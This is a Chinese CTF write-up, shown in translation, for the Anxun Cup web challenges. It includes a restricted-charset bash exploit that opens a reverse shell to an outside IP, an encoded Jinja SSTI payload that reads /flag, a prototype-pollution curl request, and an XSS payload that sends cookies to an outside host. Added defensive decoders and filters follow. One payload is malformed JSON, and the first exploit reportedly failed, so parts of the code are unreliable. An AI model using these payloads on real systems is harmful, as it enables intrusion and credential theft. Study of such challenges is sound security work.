安洵杯 (Anxun Cup) – WEB – Write-up


Got carried by my teammates, so I'm just copying their work here. Sob, the masters are way too strong.
 

WEB

BASH

Discovered that $0 = sh.

https://hack.more.systems/writeup/2017/12/30/34c3ctf-minbashmaxfun/

Found this one.

That only gives the digit 1, but 1 = ${##} (the length of $#, which expands to 0 when there are no positional parameters).

${!#} = ${0} (indirect expansion of $#, i.e. $0)

# Exploit adapted from the 34c3 minbashmaxfun write-up linked above; the pwntools
# parts are commented out because this challenge takes the command over HTTP.
#from pwn import *
import sys
import requests

url = "http://47.108.162.43:30023"

def send_cmd(cmd):
    # Encode the command with the restricted character set and POST it as "cmd".
    #r = remote("35.198.107.77", 1337)
    payload = build_payload(cmd)
    data = {
        "cmd": payload
    }
    req = requests.post(url, data=data)
    print(req.text)

def nextpid(r):
    # Only used by the original pwntools version (r is a pwntools tube); unused here.
    r.sendline(b"$$")
    r.readuntil(b"bash: ")
    pid = int(r.readuntil(b":")[:-1], 10)
    print("current pid: {}".format(pid))
    r.readline()
    return pid + 1

# Nested here-strings: each ${0}<<< layer strips one level of backslashes, so the
# innermost $'...' string is only interpreted after several rounds of expansion.
base_payload = rb"${0}<<<${0}\<\<\<${0}\\\<\\\<\\\<${0}\\\\\\\<\\\\\\\<\\\\\\\<\\\\\\\$\\\\\\\'"
base_payload_end = rb"\\\\\\\'"

def build_payload(string):
    bstr = string.encode()
    payload = base_payload
    for char in bstr:
        payload += encode_character(char)
    payload += base_payload_end
    return payload

def encode_character(byte):
    # Every byte becomes an octal escape \ooo; each octal digit is written as
    # $# (0), ${##} (1) or an arithmetic expression built from repeated ${##} (2..7).
    # The join separator goes through $$ (the shell's PID), which nextpid() lines up
    # in the original write-up and which nothing controls here.
    octals = "{:o}".format(byte)
    payload = rb"\\\\\\\\"
    for octal in octals:
        num = int(octal, 8)
        if num == 0:
            payload += rb"$#"
        elif num == 1:
            payload += rb"${##}"
        else:
            payload += rb"\\\$\\\(\\\("
            payload += rb"\$\'\\$$\'".join([rb"${##}" for i in range(num)])
            payload += rb"\\\)\\\)"
    return payload

#while True:
cmd = "bash -i >& /dev/tcp/132.232.82.54/9998 0>&1"
send_cmd(cmd)   # the copied version read "send_cmd" without the call

But the shell never came back. After studying how that payload is constructed, guoke wrote his own exploit.

 

Command execution script (by guoke, absolute legend)

import sys

# Builds the command from only $ # { } < ( ) \ ' and 0:
#   $#                 -> 0
#   ${##}              -> 1
#   $((${##}<<${##}))  -> 2, used as the base of a 2#<bits> literal
# The bits spell the decimal number whose digits are the byte's octal code
# (e.g. 'a' = \141 -> 141 -> 2#10001101), and $'\<octal>' turns it back into the byte.
# No '+' and no $$ are needed, which is what the copied exploit depended on.
start = r"$0<<<$0\<\<\<"
for i in sys.argv[1]:
    # oct(ord(i)) is "0o141" in Python 3; the original was Python 2, where it was "0141".
    payload = bin(int(oct(ord(i))[2:]))[2:].replace('1', '${##}').replace('0', '$#')
    start += r"$\'\\$(($((${##}<<${##}))#" + payload + r"))\'"
print(start)
# usage: python exp.py "ls>1.txt"
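As an added example (mine, not code from this write-up or from the 34c3 one), here is a small Python triage helper for a captured cmd parameter: it flags a value that stays inside the $0<<< character set and decodes the exp.py encoding back to the command it would run, which is what a WAF rule or a log review needs. The regex is tied to the exact string the script above emits; the allowed character set and the 16-byte length threshold are my own assumptions, and the sample payload is constructed by hand.

```python
import re

# Recognises the restricted-charset bash encoding used by exp.py above, where every
# byte is written as $'\<octal>' with the octal code spelled as a base-2 literal:
#   $#                 -> 0
#   ${##}              -> 1   (length of "$#", which is "0")
#   $((${##}<<${##}))  -> 2   (1 << 1), the base in 2#<bits>
# Characters such a payload can contain (assumption: the page's own alphabet).
ALLOWED = set("$#{}<>()\\'0")

# One encoded character, exactly as exp.py emits it.
_PREFIX = r"$\'\\$(($((${##}<<${##}))#"
_SUFFIX = r"))\'"
_CHAR_RE = re.compile(re.escape(_PREFIX) + r"((?:\$\{##\}|\$#)+)" + re.escape(_SUFFIX))


def is_restricted_charset(cmd: str, min_len: int = 16) -> bool:
    """True if the parameter is long and uses nothing outside the $0<<< trick alphabet."""
    return len(cmd) >= min_len and set(cmd) <= ALLOWED


def decode_restricted_payload(cmd: str) -> str:
    """Recover the command a payload in the exp.py format would execute."""
    out = []
    for m in _CHAR_RE.finditer(cmd):
        bits = m.group(1).replace("${##}", "1").replace("$#", "0")
        octal_digits = str(int(bits, 2))        # 2#bits as bash evaluates it, e.g. 151
        out.append(chr(int(octal_digits, 8)))   # $'\151' -> 'i'
    return "".join(out)


def triage(cmd: str) -> dict:
    """What a WAF or log-review script would record for one request parameter."""
    suspicious = is_restricted_charset(cmd)
    decoded = decode_restricted_payload(cmd) if suspicious else ""
    return {"suspicious": suspicious, "decoded": decoded}


# Constructed sample: the encoding of "id" in the exp.py format, built by hand.
SAMPLE = (r"$0<<<$0\<\<\<"
          + _PREFIX + "${##}$#$#${##}$#${##}${##}${##}" + _SUFFIX   # 2#10010111 = 151 -> \151 = 'i'
          + _PREFIX + "${##}$#$#${##}$#$#$#$#" + _SUFFIX)           # 2#10010000 = 144 -> \144 = 'd'

if __name__ == "__main__":
    print(triage(SAMPLE))          # {'suspicious': True, 'decoded': 'id'}
    print(triage("ls -la /tmp"))   # {'suspicious': False, 'decoded': ''}
```

The charset check alone is a cheap first-pass signal (ordinary shell commands contain letters); the decoder is for the analyst who then wants to know what the request would have executed.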

normal

http://47.108.162.43:30023/test?url={%print%0a(lipsum|attr("\137\137\147\154\157\142\141\154\163\137\137"))|attr("\137\137\147\145\164\151\164\145\155\137\137")("\137\137\142\165\151\154\164\151\156\163\137\137")|attr("\137\137\147\145\164\151\164\145\155\137\137")("\145\166\141\154")("\137\137\151\155\160\157\162\164\137\137\50\47\157\163\47\51\56\160\157\160\145\156\50\47\143\141\164\40\57\146\154\141\147\47\51\56\162\145\141\144\50\51")%}

%0a in place of spaces, plus attr() with octal escapes, bypasses the filter.
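Added example, not part of the write-up: the normalisation a WAF or log review needs before a keyword rule can see through this bypass. It URL-decodes the parameter, resolves \ooo escapes so "\137\137" reads as "__", collapses the newline, and only then matches a watch-list of attribute names. The watch-list is my own choice, and the sample is a cut-down version of the URL above.

```python
import re
from urllib.parse import unquote

OCTAL_ESC = re.compile(r"\\([0-7]{1,3})")
# Names whose appearance inside attr()/getitem chains signal object-walking towards
# code execution. The list is this example's own choice, not from the page.
WATCHLIST = ("__globals__", "__builtins__", "__import__", "__subclasses__",
             "__getitem__", "eval", "popen")


def normalise_template_input(raw: str) -> str:
    """URL-decode, then resolve \\ooo escapes so that "\\137\\137" reads as "__"."""
    text = unquote(raw)                                        # %0a -> newline, %22 -> "
    text = OCTAL_ESC.sub(lambda m: chr(int(m.group(1), 8)), text)
    return text.replace("\n", " ")


def ssti_indicators(raw: str) -> list:
    """Return the watch-listed names present after normalisation (empty means clean)."""
    text = normalise_template_input(raw)
    return [w for w in WATCHLIST if w in text]


# Constructed sample in the shape of the page's URL, reduced to the first attr() calls:
# lipsum|attr("__globals__")|attr("__getitem__")("eval")
SAMPLE = ('{%print%0a(lipsum|attr("\\137\\137\\147\\154\\157\\142\\141\\154\\163\\137\\137"))'
          '|attr("\\137\\137\\147\\145\\164\\151\\164\\145\\155\\137\\137")("\\145\\166\\141\\154")%}')
BENIGN = "{%print%0aname%}"

if __name__ == "__main__":
    print(normalise_template_input(SAMPLE))
    print(ssti_indicators(SAMPLE))   # ['__globals__', '__getitem__', 'eval']
    print(ssti_indicators(BENIGN))   # []
```

A rule that matches the raw query string never fires here, because neither "__" nor a space is present until the escapes are resolved; decoding before matching is the whole point.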

Validator

http://47.108.162.43:30023/app.js

http://47.108.162.43:30023/package.json

https://github.com/NeSE-Team/XNUCA2020Qualifier/tree/main/Web/oooooooldjs

It has a payload. Just fire it off.

curl -vv --header 'Content-type: application/json' -d '{"__proto__": ["system_open": "yes"]}'  http://47.108.162.43:30023/

easyxss

Straightforward prototype pollution.

See this tweet for details: https://twitter.com/S1r1u5_/status/1328371034064515077

{"__proto__":{"preventDefault":"x","handleObj":"x","delegateTarget":"<img/src/onerror=alert(1337)>"}}

So the final payload is

http://47.108.162.43:3000/?data={%22__proto__%22:{%22preventDefault%22:%22x%22,%22handleObj%22:%22x%22,%22delegateTarget%22:%22%3Cimg/src/onerror=fetch(%27http://132.232.82.54:9999/?flag%3d%27%2bdocument.cookie)%3E%22}}
Then the challenge author looked into it and said this was an unintended solution; waiting to see the intended one.
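Added example (mine, not the challenges' or the write-up's code): the boundary check that closes this bug class on the server side, written in Python as a generic JSON pre-filter. Both Validator and easyxss were solved by sending JSON with a __proto__ key, the signature of prototype pollution, so the filter rejects any document that carries a __proto__, constructor or prototype key at any depth before it reaches a merge. The POLLUTED sample is the easyxss payload above; NESTED and BENIGN are constructed.

```python
import json

FORBIDDEN_KEYS = {"__proto__", "constructor", "prototype"}


def find_polluting_keys(node, path="$"):
    """Return JSONPath-style locations of every forbidden key anywhere in the document."""
    hits = []
    if isinstance(node, dict):
        for key, value in node.items():
            here = f"{path}.{key}"
            if key in FORBIDDEN_KEYS:
                hits.append(here)
            hits.extend(find_polluting_keys(value, here))   # recurse: nested objects too
    elif isinstance(node, list):
        for i, value in enumerate(node):
            hits.extend(find_polluting_keys(value, f"{path}[{i}]"))
    return hits


def parse_untrusted_json(raw: str):
    """Parse JSON and refuse it if any object carries a prototype-pollution key."""
    doc = json.loads(raw)
    hits = find_polluting_keys(doc)
    if hits:
        raise ValueError("prototype pollution attempt at " + ", ".join(hits))
    return doc


# The easyxss payload from the page, plus two constructed documents.
POLLUTED = '{"__proto__":{"preventDefault":"x","handleObj":"x","delegateTarget":"<img/src/onerror=alert(1337)>"}}'
NESTED = '{"settings":[{"theme":"dark"},{"constructor":{"prototype":{"system_open":"yes"}}}]}'
BENIGN = '{"settings":[{"theme":"dark"}]}'

if __name__ == "__main__":
    for doc in (POLLUTED, NESTED, BENIGN):
        try:
            parse_untrusted_json(doc)
            print("accepted:", doc)
        except ValueError as e:
            print("rejected:", e)
```

Checking the whole tree matters because the constructor.prototype path reaches Object.prototype just as __proto__ does, and a merge that only screens top-level keys leaves nested objects open.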
